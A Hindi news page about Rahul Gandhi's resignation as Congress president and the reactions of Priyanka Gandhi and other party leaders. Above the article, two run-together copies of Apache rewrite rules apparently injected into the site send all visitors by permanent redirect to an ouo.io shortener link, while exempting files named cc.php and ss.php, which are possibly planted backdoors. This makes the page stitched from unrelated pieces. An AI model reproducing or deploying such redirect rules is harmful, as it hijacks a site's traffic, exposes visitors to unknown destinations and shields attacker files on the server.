
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 550
राहुल गांधी (Rahul Gandhi) के कांग्रेस अध्यक्ष पद (Congress President) से इस्तीफे (Resign) को लेकर बुधवार को किए गए औपचारिक ऐलान के बाद पार्टी की महासचिव प्रियंका गांधी (Priyanka Gandhi Vadra) ने ट्वीट किया है। प्रियंका ने गुरुवार को राहुल गांधी को ट्वीट में टैग करते हुए लिखा है कि जैसा आपने किया, वैसी हिम्मत कुछ में ही होती है।
प्रियंका गांधी वाड्रा ने ट्वीट में आगे लिखा कि आपके फैसले के प्रति पूरी तरह से सम्मान है। मालूम हो कि लोकसभा चुनाव के बाद से अपने इस्तीफे को लेकर एक महीने से बनी असमंजस की स्थिति पर पूर्णविराम लगाते हुए राहुल गांधी ने बुधवार को त्यागपत्र की औपचारिक घोषणा कर दी थी और कहा कि पार्टी के 'भविष्य के विकास के लिए उन्होंने यह कदम उठाया है।'
चुनावी हार की नैतिक जिम्मेदारी लेते हुए गांधी ने कांग्रेस कार्य समिति (सीडब्ल्यूसी) को यह सुझाव भी दिया कि नया अध्यक्ष चुनने के लिए एक समूह गठित किया जाए क्योंकि उनके लिए यह उपयुक्त नहीं है कि वह इस प्रक्रिया में शामिल हों।
राहुल गांधी ने चार पृष्ठों के खुले पत्र के जरिए इस्तीफे की सार्वजनिक घोषणा करने के साथ ही यह भी कहा कि कांग्रेस उनकी रग-रग में है और भारत के संविधान पर हमले के खिलाफ लड़ाई से खुद को अलग नहीं कर रहे हैं तथा अंतिम सांस तक पार्टी एवं देश के लिए काम करते रहेंगे।
कांग्रेस नेताओं ने कहा: हमारे नेता बने रहेंगे राहुल
राहुल गांधी के इस्तीफे की औपचारिक घोषणा के बाद कांग्रेस के कई वरिष्ठ नेताओं ने बुधवार को कहा कि गांधी ने भले ही पार्टी अध्यक्ष पद से त्यागपत्र दे दिया हो, लेकिन वह उनके नेता बने रहेंगे। पार्टी के वरिष्ठ नेता आनंद शर्मा ने ट्वीट कर कहा, ''राहुल गांधी का अपने इस्तीफ के बारे में दिया गया बयान कांग्रेस के लाखों कार्यकर्ताओं को भावनात्मक रूप से छूने वाला है। सभी वरिष्ठ नेताओं और कार्यकर्ताओं की इच्छा थी कि वह अध्यक्ष बने रहें।